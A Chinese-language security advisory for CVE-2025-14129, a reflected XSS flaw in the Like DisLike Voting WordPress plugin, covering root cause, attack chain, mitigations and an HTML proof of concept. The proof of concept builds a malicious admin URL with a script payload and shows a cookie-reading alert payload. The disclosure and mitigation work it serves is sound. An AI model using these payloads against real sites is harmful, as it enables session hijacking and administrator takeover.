CVE-2025-14129 WordPress Like DisLike Voting插件反射型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-14129

漏洞类型

反射型跨站脚本(XSS)

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Like DisLike Voting plugin for WordPress

漏洞概述

CVE-2025-14129是WordPress平台上一款名为"Like DisLike Voting"的投票插件存在的安全漏洞。该插件在1.0.1及之前所有版本中，由于对用户输入处理不当，导致存在反射型跨站脚本(XSS)安全风险。漏洞产生的根本原因在于插件直接使用了PHP的$_SERVER['PHP_SELF']变量，该变量包含当前脚本的路径信息，攻击者可以通过构造恶意链接，在URL中注入任意JavaScript代码。当受害者点击攻击者精心构造的恶意链接时，注入的脚本将在受害者浏览器中执行，可能导致会话劫持、敏感信息窃取、网页篡改等严重安全问题。由于该漏洞属于反射型XSS，需要用户交互(如点击链接)才能触发，因此攻击复杂度相对较高，但仍然对网站安全性构成威胁。

技术细节

该漏洞存在于Like DisLike Voting插件的function.php文件第76行附近。漏洞产生的具体原因是插件代码直接获取并使用了$_SERVER['PHP_SELF']变量，而没有对其进行充分的输入验证和输出转义。$_SERVER['PHP_SELF']是PHP预定义变量，返回当前执行脚本的文件名路径。在Web应用中，如果直接将此变量输出到HTML页面而未进行适当处理，攻击者可以在URL路径部分注入恶意脚本代码。例如，访问形如/wp-admin/admin.php/<script>alert('XSS')</script>的URL时，PHP_SELF变量将包含完整的路径信息，当插件将其输出到页面时，浏览器会将其解析为HTML标签并执行其中的JavaScript代码。攻击者利用社会工程学手段诱导用户点击此类恶意链接，即可在受害者上下文中执行任意前端代码。由于插件通常在WordPress管理后台使用，攻击成功可能导致管理员账户被接管，进而控制整个WordPress站点。

攻击链分析

STEP 1

步骤1

攻击者构造包含XSS payload的恶意URL，在URL路径中注入JavaScript代码，如：/wp-admin/admin.php/<script>alert('XSS')</script>

STEP 2

步骤2

攻击者通过钓鱼邮件、社交媒体或其他渠道诱导目标用户点击该恶意链接

STEP 3

步骤3

用户浏览器向目标服务器发送请求，服务器将$_SERVER['PHP_SELF']变量包含的恶意脚本反射回响应页面

STEP 4

步骤4

用户浏览器解析HTML响应时，将URL路径中的<script>标签识别为有效脚本并执行

STEP 5

步骤5

攻击者通过注入的JavaScript代码窃取用户会话Cookie、劫持账户或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-14129 PoC: Reflected XSS in Like DisLike Voting WordPress Plugin -->
<!-- Target: Like DisLike Voting plugin <= 1.0.1 -->
<!-- Attack Vector: Malicious URL via $_SERVER['PHP_SELF'] -->

<!DOCTYPE html>
<html>
<head>
    <title>CVE-2025-14129 PoC</title>
</head>
<body>
    <h3>CVE-2025-14129 Reflected XSS PoC</h3>
    <p>Target: Like DisLike Voting plugin for WordPress <= 1.0.1</p>
    
    <!-- Malicious URL that triggers the XSS -->
    <p>Malicious URL:</p>
    <code id="malicious-url"></code>
    
    <script>
        // Construct the malicious URL
        // The XSS payload is injected into the PHP_SELF path
        var targetBase = window.location.origin + '/wp-admin/admin.php';
        var xssPayload = '<script>alert("XSS CVE-2025-14129")</script>';
        var maliciousUrl = targetBase + '/' + xssPayload;
        
        document.getElementById('malicious-url').textContent = maliciousUrl;
        
        // Example attack scenario
        console.log('CVE-2025-14129 Attack URL:', maliciousUrl);
        
        // When victim visits this URL, the XSS payload in PHP_SELF will be reflected
        // and executed in the victim's browser context
    </script>
    
    <!-- Simulated attack flow -->
    <h4>Attack Scenario:</h4>
    <ol>
        <li>Attacker crafts a malicious URL containing XSS payload in path</li>
        <li>Victim is tricked into clicking the malicious link</li>
        <li>Server reflects the unsanitized PHP_SELF in response</li>
        <li>Victim's browser executes the injected JavaScript</li>
        <li>Attacker steals session cookies or performs actions as victim</li>
    </ol>
    
    <!-- Direct XSS payload for reference -->
    <p>XSS Payload: <code>&lt;script&gt;alert(document.cookie)&lt;/script&gt;</code></p>
</body>
</html>

影响范围

Like DisLike Voting plugin for WordPress <= 1.0.1

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1)暂时禁用或删除Like DisLike Voting插件；2)使用WordPress安全插件如Wordfence添加额外防护层；3)在Web服务器层面配置URL过滤规则，拦截包含可疑script标签的请求；4)加强对管理员账户的安全认证，启用双因素认证；5)监控服务器日志关注异常的XSS攻击特征请求。